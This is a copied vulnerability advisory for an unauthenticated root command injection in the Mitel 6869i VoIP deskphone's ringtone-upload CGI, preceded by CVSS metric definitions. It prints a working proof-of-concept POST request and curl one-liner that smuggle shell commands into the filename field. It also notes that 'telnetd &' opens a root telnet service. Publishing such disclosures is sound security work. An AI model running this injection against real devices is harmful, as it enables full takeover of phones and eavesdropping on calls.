The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: Mitel 6869i Voip Deskphone 4.2.2032 Command Injection
BlueBox Security
http://www.bluebox-security.de/ security(at)bluebox-security.de
bbs-2019.001.txt 08-August-2019
____________________________________________________________________________
Vendor: Mitel
Affected Products: Mitel 6869i Voip Deskphone Version 4.2.2032 - SIP
Not Affected: unknown
Vulnerability: Mitel 6869i SIP Deskphone 4.2.2032: Unauthenticated Bash
Command Injection Vulnerability with Root Priviledges in
/cgi-bin/webuploadconfig script
Risk: High
____________________________________________________________________________
Vendor communication:
2019/08/08 BlueBox Security releases this advisory
____________________________________________________________________________
Overview:
--------
The Mitel 6869i is a desktop VoIP phone offering telephony features.
A webservice running on the TCP Port 49249 is used to administrate the phone's
VoIP settings, upgrade the firmware and change security settings.
Description:
--------
The Webserver on port 49249 of the Mitel 6869i phone is using the "webuploadconfig" cgi-script,
an arm linux elf executable file, to upload ring tone audio files to the
phone with the page=upload_ringtone parameter.
The execution of this cgi-script does not require prior authentication.
Futhermore the script is vulnerable to Bash Command Injection.
The filename value of the POST request is used unsanitized in a system() call.
The vulnerable POST request to the webuploadconfig-script is the following:
POST //cgi-bin/webuploadconfig?page=upload_ringtone&action=submit§ion=0&conn=1 HTTP/1.1
Host: 192.168.178.147:49249
User-Agent: curl/7.65.1
Accept: */*
Content-Length: 185
Content-Type: multipart/form-data; boundary=------------------------2754e6a90f270263
Connection: close
--------------------------2754e6a90f270263
Content-Disposition: form-data; name="file"; filename="`ping -c 1 192.168.178.140`"
pwned
--------------------------2754e6a90f270263--
By inserting "|command", "`command`" or "$(command) as the value of the "filename" parameter
the "command" is executed on the underlying linux operating system.
The following linux bash commandline exploits this vulnerability and executes the
command "ping -c 1 192.168.178.140" on the Mitel 6869i phone with the IP Adress
192.168.178.147 with root priviledges:
$ echo "pwned" | curl -F "file=@-;filename=\`ping -c 1 192.168.178.140\`" \
"http://192.168.178.147:49249//cgi-bin/webuploadconfig?page=upload_ringtone&action=submit§ion=0&conn=1"
To verify the successfull completion of the ping-command on the Mitel 6869i
phone, start tcpdump on the host system and listen for incoming icmp requests.
(eg by running tcpdump -i eth0 -n icmp)
The "webuploadconfig" cgi-script also runs with superuser root-priviledges as
the telnetd service can be started on the restricted TCP-port 23 by replacing
the ping-command with "telnetd &".
Impact:
--------
The described problems allow an unauthenticated attacker to run arbitary linux
operating system commands with root-priledges. This leads to a complete comprimise
of the Mitel 6869i phone and therefore also the possibility to eavesdrop on the
victim's calls.
Solution
--------
We recommend to properly perform input parsing of the filename parameter to avoid
Command Injection vulnerabilities.
As a quick fix blocking access to the port 49249 is advisable.
________________________________________________________________________
Credits:
Bug found by Axel Rengstorf <[email protected]> of Bluebox Security
________________________________________________________________________
References:
This Advisory and Upcoming Advisories:
http://bluebox-security.de/advisories.html
________________________________________________________________________
About BlueBox Security:
BlueBox Security is a vendor-independent security consulting company
specialising in the areas of voip/pbx telephone infrastructures security
analysis, source code audits and analysis of iot/embedded systems.
https://www.bluebox-security.de
Contact: [email protected]
Copyright Notice:
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
[email protected] for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded.
In no event shall BlueBox Security be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if the author has been advised of the possibility of
such damages.
Copyright 2019 Axel Rengstorf. All rights reserved. Terms of use apply.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum